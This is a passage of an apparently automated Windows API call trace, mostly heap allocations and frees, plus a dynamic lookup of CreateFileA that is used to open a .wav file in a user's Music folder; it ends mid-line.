[0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.255] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.256] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.257] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.258] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.258] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.259] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.260] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.260] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cdc0 [0038.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cdc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.261] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0038.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.261] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.261] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x34) returned 0x7c2080 [0038.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", cchWideChar=52, lpMultiByteStr=0x7c2080, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpUsedDefaultChar=0x0) returned 52 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.262] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohsky-a9exl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.262] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x68) returned 0x7c10a8 [0038.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x7c10a8, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav") returned 52 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.263] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.263] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.264] HeapFree (in: 